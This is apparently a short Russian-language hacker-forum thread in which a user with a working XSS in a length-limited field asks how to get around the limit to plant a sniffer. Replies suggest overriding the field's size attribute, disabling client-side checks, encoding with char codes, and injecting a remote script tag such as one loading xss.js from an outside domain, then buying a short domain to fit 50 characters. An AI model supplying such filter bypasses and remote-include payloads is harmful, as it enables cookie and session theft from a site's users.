Вот есть поле, там работает алерт, но ввод символов ограничен...как можно обойти данное ограничение ? (для снифера)

возможно ограничение реализовано путём выставления значения size, попробуй сохранить страницу, переопредели это значеие для уязвимого поля на более длинное, пропишу полнуй путь к скрипту и попробуй выполнить. Второй вариант, то что возможно проверка реализована только ява скриптом, нада либо найти это место и вырезать либо отключить выполнение жабаскрипта, но тогда ты сам не увидишь результат выполнения :) . Но это всё оочень мало вероятно и скорей всего проверка и на клиенте и на серванте :)

но ввод символов ограничен
И что мы под этим должны понимать? ограничение по размеру или фильтрация? а может поле заколдовано и на хакеров, пытаюшихся его заxssить наводится порча?

юзай кодировку в чарс

<script src="http://www.ya.ru/1.js"></script>- короче ничего не знаю :(

инклудом
<SCRIPT SRC=http://xek.site/xss.js></SCRIPT>

в поле можно водить только 50 символов.
инклуд, самое оно :) но нужен короткий домен(

Купи, трёхбуквенники ещё остались.